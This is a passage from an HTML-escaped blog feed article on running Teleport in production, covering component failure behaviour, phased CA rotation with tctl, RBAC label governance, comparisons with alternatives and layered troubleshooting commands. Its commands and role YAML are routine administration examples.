&lt;ul&gt;
&lt;li&gt;Forward audit logs to SIEM (Splunk, Elasticsearch)&lt;/li&gt;
&lt;li&gt;Send alerts to incident response tools&lt;/li&gt;
&lt;li&gt;Integrate access requests with ticketing systems&lt;/li&gt;
&lt;li&gt;Use webhooks for custom workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  Failure Modes and Operational Realities
&lt;/h2&gt;

&lt;p&gt;Understanding failure behavior is essential for operating Teleport in production. A system you can't reason about under failure is a system you can't trust.&lt;/p&gt;


&lt;h3&gt;
  
  
  Component Failure Behavior
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Failure Impact&lt;/th&gt;
&lt;th&gt;Active Sessions&lt;/th&gt;
&lt;th&gt;New Sessions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Auth Service&lt;/td&gt;
&lt;td&gt;Cannot issue new certificates&lt;/td&gt;
&lt;td&gt;Continue (until cert expires)&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Proxy Service&lt;/td&gt;
&lt;td&gt;All inbound access unavailable&lt;/td&gt;
&lt;td&gt;Dropped&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backend (DB/DynamoDB) degraded&lt;/td&gt;
&lt;td&gt;Auth latency spikes, audit log lag&lt;/td&gt;
&lt;td&gt;Likely continue (cached state)&lt;/td&gt;
&lt;td&gt;Degraded/slow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Single Proxy in HA cluster&lt;/td&gt;
&lt;td&gt;Remaining proxies absorb traffic&lt;/td&gt;
&lt;td&gt;Disrupted briefly&lt;/td&gt;
&lt;td&gt;Rerouted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent&lt;/td&gt;
&lt;td&gt;Resources behind that agent unreachable&lt;/td&gt;
&lt;td&gt;Terminated&lt;/td&gt;
&lt;td&gt;Blocked for those resources&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Key takeaways:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Auth Service is the highest-impact single point of failure in a non-HA deployment. Existing sessions continue until their certificate TTL expires, but no new access can be established. &lt;strong&gt;This is the #1 reason to deploy Auth in HA mode for any production environment.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Proxy failure is immediately user-visible — all active sessions terminate. Multiple Proxies behind a load balancer are non-negotiable for production.&lt;/li&gt;
&lt;li&gt;Backend degradation creates a "slow door" scenario: the system keeps working but sluggishly, often producing confusing timeout errors that look like network issues.&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  CA Rotation
&lt;/h3&gt;

&lt;p&gt;CA rotation is the nuclear option for credential invalidation — it invalidates all outstanding certificates cluster-wide. This is powerful but operationally non-trivial:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rotation has a &lt;strong&gt;grace period&lt;/strong&gt; where both old and new CA are trusted simultaneously&lt;/li&gt;
&lt;li&gt;All agents must pick up the new CA before the grace period ends&lt;/li&gt;
&lt;li&gt;Any agent that doesn't rotate in time will start rejecting connections&lt;/li&gt;
&lt;li&gt;Rotation of a large fleet requires careful monitoring and rollout coordination&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Test CA rotation in staging at least once before you need it in production under incident conditions.&lt;/p&gt;
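
&lt;p&gt;A sketch of a manual, phased rotation with &lt;code&gt;tctl&lt;/code&gt; — advance each phase only after confirming the fleet has caught up:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Enter the initial phase: a new CA is generated but not yet in use
tctl auth rotate --manual --type=host --phase=init

# Clients, then servers, move to the new CA; the old CA is still trusted
tctl auth rotate --manual --type=host --phase=update_clients
tctl auth rotate --manual --type=host --phase=update_servers

# Finalize: the old CA is dropped; any straggler agents are now locked out
tctl auth rotate --manual --type=host --phase=standby

# Alternatively, let Teleport drive the phases on a timer
tctl auth rotate --type=host --grace-period=48h
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;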


&lt;h3&gt;
  
  
  RBAC Sprawl
&lt;/h3&gt;

&lt;p&gt;Label-based RBAC scales beautifully at small size and becomes a maintenance burden at scale if not governed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Undocumented labels&lt;/strong&gt; on resources create invisible access grants&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Role proliferation&lt;/strong&gt; — teams creating one-off roles instead of composing existing ones — makes audit reviews painful&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Label drift&lt;/strong&gt; — resources retagged without RBAC review can accidentally expand access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Treat labels as a contract, not metadata. Enforce label schemas via infrastructure-as-code and audit them as part of change review.&lt;/p&gt;


&lt;h3&gt;
  
  
  Debugging Is Harder Than Direct SSH
&lt;/h3&gt;

&lt;p&gt;Teleport adds indirection: every control point between you and the resource is a potential failure boundary. When access fails, the failure could be at any layer:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate expired or wrong cluster&lt;/li&gt;
&lt;li&gt;RBAC label mismatch&lt;/li&gt;
&lt;li&gt;Reverse tunnel down (agent offline)&lt;/li&gt;
&lt;li&gt;Proxy routing issue&lt;/li&gt;
&lt;li&gt;Network connectivity between Proxy and Agent&lt;/li&gt;
&lt;li&gt;Resource itself refusing connection&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;code&gt;tsh status&lt;/code&gt;, &lt;code&gt;tctl nodes ls&lt;/code&gt;, and Proxy Service logs are your first three debugging tools. Build runbooks for common failure paths before you need them at 2am.&lt;/p&gt;
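
&lt;p&gt;A first-pass triage sequence that walks those layers in order (the node name is hypothetical):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Layer 1: certificate expired, or logged into the wrong cluster?
tsh status

# Layers 2-3: does RBAC let me see the node, and is its reverse tunnel up?
tsh ls
tctl nodes ls

# Layers 4-6: retry with verbose client logging to localize the failing hop
tsh --debug ssh root@prod-web-01
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;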




&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  Trade-offs, Limitations, and Alternatives
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Teleport Trade-offs
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Trade-off&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Latency&lt;/td&gt;
&lt;td&gt;Teleport adds an extra network and TLS hop on every connection — negligible for interactive SSH sessions, but noticeable for high-throughput or latency-sensitive database workloads. Benchmark before assuming it's acceptable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complexity&lt;/td&gt;
&lt;td&gt;You're now operating a control plane (Auth + Proxy + Backend). This is less complex than a VPN + bastion + key management stack, but it's still infrastructure you own and must keep healthy.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lock-in&lt;/td&gt;
&lt;td&gt;Strong coupling to Teleport's certificate model, RBAC system, and agent deployment. Migrating away is non-trivial.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Debugging&lt;/td&gt;
&lt;td&gt;Failures are less transparent than direct SSH. Every hop is a potential failure point.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost&lt;/td&gt;
&lt;td&gt;Self-hosted requires infra + ops investment. Enterprise features (Device Trust, Access Monitoring, Policy) add license cost.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CA rotation&lt;/td&gt;
&lt;td&gt;Invalidating all credentials is operationally complex and requires advance planning.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;


&lt;h3&gt;
  
  
  What Teleport Does NOT Solve
&lt;/h3&gt;

&lt;p&gt;Teleport enforces access at the &lt;strong&gt;entry point&lt;/strong&gt;, not within the system. It secures the &lt;em&gt;path&lt;/em&gt; to infrastructure — it does not secure what happens &lt;em&gt;inside&lt;/em&gt; infrastructure after access is granted:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Application-level authorization&lt;/strong&gt;: Teleport gets you a shell or a DB connection. What you do with it is governed by application and database permissions, not Teleport.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lateral movement inside a host&lt;/strong&gt;: Once a user has SSH access to a server, they can attempt to move laterally to other systems reachable from that host. Teleport doesn't prevent this.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compromised workloads&lt;/strong&gt;: If a service running on a server is compromised, that service can use its existing credentials. Teleport doesn't protect against post-exploitation of running workloads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secrets inside applications&lt;/strong&gt;: Environment variables, config files, and secrets managers are outside Teleport's scope.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Insider threats post-access&lt;/strong&gt;: Teleport records &lt;em&gt;what&lt;/em&gt; was done, which helps with detection and forensics — but it doesn't prevent a malicious authorized user from exfiltrating data during their session.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Teleport is one layer of a defense-in-depth strategy, not a complete security posture.&lt;/p&gt;


&lt;h3&gt;
  
  
  Comparison With Modern Alternatives
&lt;/h3&gt;

&lt;p&gt;Teleport is not the only approach to modern infrastructure access:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Strengths&lt;/th&gt;
&lt;th&gt;Weaknesses vs Teleport&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AWS SSM / IAM Identity Center&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Infrastructure-native&lt;/td&gt;
&lt;td&gt;No agent to maintain on AWS resources, native IAM integration&lt;/td&gt;
&lt;td&gt;AWS-only, limited protocol support, weaker audit UI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloudflare Access / Zero Trust&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Identity-aware proxy&lt;/td&gt;
&lt;td&gt;Excellent for web apps and browser-based access, global PoPs&lt;/td&gt;
&lt;td&gt;Weaker for SSH/DB/K8s native protocol support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tailscale&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mesh VPN + identity&lt;/td&gt;
&lt;td&gt;Very simple to operate, low overhead, great for small teams&lt;/td&gt;
&lt;td&gt;No session recording, weaker RBAC, not compliance-oriented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;BeyondCorp (Google)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Device + identity aware proxy&lt;/td&gt;
&lt;td&gt;Proven at extreme scale&lt;/td&gt;
&lt;td&gt;Expensive, complex to replicate outside Google's ecosystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CyberArk / HashiCorp Vault&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PAM / secrets management&lt;/td&gt;
&lt;td&gt;Deep secrets management, strong enterprise PAM&lt;/td&gt;
&lt;td&gt;More complex to operate, less developer-friendly UX&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Where Teleport fits:&lt;/strong&gt; Teleport sits between identity-aware proxies (Cloudflare, BeyondCorp) and infrastructure-native access systems (SSM). It offers deeper protocol-level control and richer session recording than most ZTNA tools, at the cost of a more complex control plane to operate.&lt;/p&gt;


&lt;h3&gt;
  
  
  When Teleport Becomes a Bad Idea
&lt;/h3&gt;

&lt;p&gt;Teleport pays off in complex environments, not simple ones. There are clear situations where adopting it is the wrong call:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;100% AWS with SSM already working well:&lt;/strong&gt; If your infrastructure is AWS-native and your team already uses SSM + IAM Identity Center effectively, Teleport adds a new control plane without proportionate gain. SSM is simpler to operate and deeply integrated with IAM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Small teams (&amp;lt; 10 engineers):&lt;/strong&gt; The operational overhead — HA deployment, CA rotation, RBAC governance, agent fleet management — often outweighs the security benefits at small scale. A well-configured bastion with short-lived keys and MFA may be the right answer.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cannot operate HA control planes reliably:&lt;/strong&gt; If you are not prepared to operate a highly available control plane, Teleport becomes a single point of failure rather than a security improvement. A single-node Auth Service gates every infrastructure connection in your environment — that's a harder failure than a downed bastion, which only blocked SSH.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ultra-low latency or high-throughput DB access:&lt;/strong&gt; Every connection transits the Proxy. For latency-sensitive or bulk-transfer database workloads, the proxying overhead is real and measurable. Benchmark before committing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Team lacks operational maturity for a distributed control plane:&lt;/strong&gt; Teleport failures are subtle. A team that isn't comfortable debugging reverse tunnel health, CA states, and RBAC label interactions will find it harder to operate than what it replaced.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The honest test:&lt;/strong&gt; If someone on your team can't answer "what happens when the Auth Service goes down?", you're not ready to run Teleport in production.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h3&gt;
  
  
  How Teams Typically Adopt Teleport
&lt;/h3&gt;

&lt;p&gt;Teleport adoption is rarely a single migration — it's an incremental replacement of legacy access patterns. Teams that succeed tend to follow a similar path:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Replace bastion SSH access&lt;/strong&gt; — lowest risk, highest immediate visibility gain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add Kubernetes and database access&lt;/strong&gt; — consolidates the access model across protocols&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Introduce Access Requests for production&lt;/strong&gt; — eliminates standing privileges for the highest-risk tier&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enable session recording for compliance&lt;/strong&gt; — adds the audit trail needed for SOC 2, PCI, HIPAA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Expand into multi-cluster federation&lt;/strong&gt; — scales the model to multiple regions or business units&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each stage delivers value independently. You don't need to complete stage 5 to justify the investment at stage 1.&lt;/p&gt;





&lt;h2&gt;
  
  
  Opinionated Architecture Guidance
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Rules of Thumb for Production Deployments
&lt;/h3&gt;

&lt;p&gt;These aren't configuration options — they're operational decisions that most teams learn the hard way:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate TTLs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Production access: ≤ 8 hours. Shorter is better. 4 hours is a reasonable default.&lt;/li&gt;
&lt;li&gt;Bot/automation tokens: ≤ 1 hour. Treat like API keys with aggressive expiry.&lt;/li&gt;
&lt;li&gt;Development access: 24 hours is acceptable. Convenience at lower risk.&lt;/li&gt;
&lt;li&gt;Never set &lt;code&gt;max_session_ttl&lt;/code&gt; longer than your incident response SLA — if a credential is compromised, you need it to expire before your team can respond.&lt;/li&gt;
&lt;/ul&gt;
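
&lt;p&gt;As a sketch, the TTL guidance above maps to a role's &lt;code&gt;max_session_ttl&lt;/code&gt; option — the role name and labels here are illustrative, so check the role reference for your Teleport version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;kind: role
version: v7
metadata:
  name: prod-access        # illustrative name
spec:
  options:
    max_session_ttl: 4h    # production: short-lived by default
  allow:
    logins: ["ubuntu"]
    node_labels:
      env: prod
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;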

&lt;p&gt;&lt;strong&gt;Access design:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Never grant direct production roles to humans. Always require Access Requests with approval for elevated access. The friction is the feature.&lt;/li&gt;
&lt;li&gt;Treat labels as a typed API, not freeform metadata. Define a label schema (env, team, region, compliance) and enforce it via IaC. Label drift creates silent access grants.&lt;/li&gt;
&lt;li&gt;Prefer role composition over role proliferation. Five composable roles are easier to audit than fifty specialized ones.&lt;/li&gt;
&lt;/ul&gt;
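
&lt;p&gt;The "request, don't hold" pattern can be expressed directly in a role: a base role whose holders can only &lt;em&gt;request&lt;/em&gt; the elevated role. A sketch with illustrative names:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;kind: role
version: v7
metadata:
  name: engineer              # base role held by humans
spec:
  allow:
    node_labels:
      env: dev                # standing access limited to dev
    request:
      roles: ["prod-access"]  # production is requestable, never held directly
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;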

&lt;p&gt;&lt;strong&gt;Cluster topology:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a single cluster until you have a concrete reason not to. Trusted Clusters add operational overhead — don't adopt them for organizational tidiness alone.&lt;/li&gt;
&lt;li&gt;Reach for Trusted Clusters when: you need hard security isolation between environments (e.g., production vs. customer tenants), you're operating in multiple regions with latency-sensitive access, or you're managing customer-isolated environments as an MSP.&lt;/li&gt;
&lt;li&gt;Avoid auto-discovery in highly dynamic environments without governance controls on labeling — auto-discovered resources with unreviewed labels can silently enter RBAC scope.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session recording:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;node&lt;/code&gt; mode for large fleets. The distributed load model scales better.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;proxy&lt;/code&gt; mode when you have strict compliance requirements and need recording to be tamper-proof from the agent side.&lt;/li&gt;
&lt;li&gt;Always record production. Storage cost is negligible compared to the compliance and forensic value.&lt;/li&gt;
&lt;/ul&gt;
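
&lt;p&gt;The recording mode is configured on the Auth Service. A minimal self-hosted &lt;code&gt;teleport.yaml&lt;/code&gt; fragment (verify the exact key against your version's config reference):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;auth_service:
  session_recording: node   # "proxy" for tamper-resistant recording at the Proxy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;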





&lt;h2&gt;
  
  
  Troubleshooting Common Issues
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Debugging Mental Model:&lt;/strong&gt; Always trace the path: &lt;strong&gt;User → Proxy → Tunnel → Agent → Resource&lt;/strong&gt;. Failures almost always occur at boundaries between these layers — start at the user end and walk forward until you find where the chain breaks.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Teleport adds multiple layers between a user and a resource. When something fails, work through the layers in order rather than jumping straight to logs. Most failures are in layers 1–3.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Layer 1: Certificate (user)         → tsh status
Layer 2: RBAC / label match         → tctl get roles, check node labels
Layer 3: Agent health               → tctl nodes ls, agent logs
Layer 4: Reverse tunnel             → Proxy logs, tctl status
Layer 5: Network (Proxy ↔ Agent)    → connectivity check, firewall rules
Layer 6: Resource itself            → resource-side logs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Concrete example — SSH connection fails:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. tsh ssh prod-server fails
   → tsh status: cert valid, roles present ✓
   → tctl nodes ls: prod-server not in list ✗

2. Agent offline — check agent logs on the server
   → Agent can't reach Proxy on port 443
   → Firewall rule blocking outbound from the new subnet ✗

Resolution: Add egress rule. Agent reconnects, node appears in inventory.

Key insight: The failure looked like an SSH problem.
It was a network problem between Agent and Proxy — two layers removed from where the user felt the error.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Most issues are not in the SSH layer — they are in the identity or routing layers above it.&lt;/p&gt;


&lt;h3&gt;
  
  
  Connection Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Cannot connect to a resource through Teleport&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate is not expired: &lt;code&gt;tsh status&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;User has appropriate role: &lt;code&gt;tsh status&lt;/code&gt; shows roles&lt;/li&gt;
&lt;li&gt;Resource labels match role's &lt;code&gt;node_labels&lt;/code&gt; / &lt;code&gt;db_labels&lt;/code&gt; / etc. — this is the most common silent failure&lt;/li&gt;
&lt;li&gt;Agent is online: &lt;code&gt;tctl nodes ls&lt;/code&gt; or Web UI (offline agent = resource disappears from inventory)&lt;/li&gt;
&lt;li&gt;Reverse tunnel is established: Check Proxy Service logs for tunnel registration events&lt;/li&gt;
&lt;/ol&gt;
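
&lt;p&gt;The checklist maps to a short command sequence — the role name and service unit below are illustrative:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 1–2. Certificate validity and assigned roles
tsh status

# 3. Compare the role's label selectors with the node's labels
tctl get roles/dev-ssh          # inspect node_labels
tctl nodes ls --format=json     # inspect labels on the target node

# 4. Agent online? Offline agents drop out of this inventory
tctl nodes ls

# 5. On the Proxy host: look for tunnel registration events
journalctl -u teleport | grep -i tunnel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;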


&lt;h3&gt;
  
  
  Certificate Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Certificate verification failures&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Causes&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificate expired (re-login with &lt;code&gt;tsh login&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;CA rotation in progress — agents that haven't yet picked up the new CA will reject connections; monitor rotation progress carefully&lt;/li&gt;
&lt;li&gt;Time skew between systems (sync NTP — even a few seconds of drift causes cert validation to fail)&lt;/li&gt;
&lt;li&gt;Wrong cluster (verify &lt;code&gt;--proxy&lt;/code&gt; parameter matches the target cluster)&lt;/li&gt;
&lt;/ul&gt;
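
&lt;p&gt;Quick checks for the two most common causes — expiry and clock skew (the proxy address is illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Expired certificate: clear local state and re-login
tsh logout &amp;amp;&amp;amp; tsh login --proxy=teleport.example.com

# Clock skew: confirm NTP sync on client and servers
date -u
timedatectl show -p NTPSynchronized
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;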


&lt;h3&gt;
  
  
  Performance Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;: Slow connections or timeouts&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network latency between Proxy and Agent — the reverse tunnel adds a round-trip; high-latency paths between Proxy and Agent are directly user-visible&lt;/li&gt;
&lt;li&gt;Backend storage performance — slow DynamoDB or PostgreSQL manifests as slow auth, slow resource listing, and delayed audit writes&lt;/li&gt;
&lt;li&gt;Session recording mode — &lt;code&gt;proxy&lt;/code&gt; mode under high load is a common but non-obvious bottleneck; consider switching to &lt;code&gt;node&lt;/code&gt; mode or scaling Proxy horizontally&lt;/li&gt;
&lt;li&gt;Reverse tunnel health — a degraded tunnel causes intermittent timeouts that are easy to mistake for network issues&lt;/li&gt;
&lt;li&gt;Agent resource usage (CPU, memory) — DB agents under high connection volume are a frequent culprit&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Teleport represents a meaningful shift in how organizations secure infrastructure access — replacing long-lived credentials with short-lived certificates, eliminating VPN perimeters with reverse tunnels, and providing comprehensive audit logging across protocols.&lt;/p&gt;

&lt;p&gt;But it's worth being precise about what that shift entails. Teleport is not just an access tool — it is a &lt;strong&gt;distributed identity and access control plane&lt;/strong&gt; that sits on the critical path of every infrastructure connection. You operate it, rotate its CA, govern its RBAC, and debug it at 2am. The security benefits are real. So are the operational costs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Takeaways:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Certificate-Based Authentication&lt;/strong&gt;: As covered in the architecture section, short-lived certificates eliminate standing credentials — but authorization still depends on centrally issued roles, and revocation requires CA rotation or lockout, not a simple flag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Architecture&lt;/strong&gt;: Every connection is independently authenticated and authorized, regardless of network location. Teleport eliminates network-based trust — it does not eliminate the need for application-level authorization, secrets management, or lateral movement controls.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unified Access&lt;/strong&gt;: Single platform for SSH, Kubernetes, databases, applications, and desktops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Protocol Native&lt;/strong&gt;: Works with existing tools (&lt;code&gt;ssh&lt;/code&gt;, &lt;code&gt;kubectl&lt;/code&gt;, &lt;code&gt;psql&lt;/code&gt;) without requiring new clients.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Comprehensive Audit&lt;/strong&gt;: Complete visibility into who accessed what, when, and what they did — session recording, event logs, and Access Request trails.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Operationally Non-Trivial&lt;/strong&gt;: HA deployment, CA rotation planning, RBAC governance, and debugging skills are requirements for production, not afterthoughts.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For teams that outgrow VPN + bastion + manual key rotation, Teleport is one of the most complete infrastructure access platforms available. The architecture is sound, the developer experience is strong, and the compliance story is well-developed. Adopt it with eyes open to the operational investment it requires, and it will pay dividends in security posture and audit readiness.&lt;/p&gt;


&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Official Documentation&lt;/strong&gt;: &lt;a href="https://goteleport.com/docs/" rel="noopener noreferrer"&gt;https://goteleport.com/docs/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Repository&lt;/strong&gt;: &lt;a href="https://github.com/gravitational/teleport" rel="noopener noreferrer"&gt;https://github.com/gravitational/teleport&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Community Forum&lt;/strong&gt;: &lt;a href="https://github.com/gravitational/teleport/discussions" rel="noopener noreferrer"&gt;https://github.com/gravitational/teleport/discussions&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Architecture Reference&lt;/strong&gt;: &lt;a href="https://goteleport.com/docs/reference/architecture/" rel="noopener noreferrer"&gt;https://goteleport.com/docs/reference/architecture/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Whitepaper&lt;/strong&gt;: Available on Teleport website&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance Documentation&lt;/strong&gt;: SOC 2, FedRAMP, and other certifications&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cloud</category>
      <category>infrastructure</category>
      <category>identity</category>
    </item>
    <item>
      <title>AppArmor and Seccomp in Kubernetes: What the Docs Don't Tell You</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 22 Mar 2026 19:05:33 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/apparmor-and-seccomp-in-kubernetes-what-the-docs-dont-tell-you-4856</link>
      <guid>https://dev.to/piyushjajoo/apparmor-and-seccomp-in-kubernetes-what-the-docs-dont-tell-you-4856</guid>
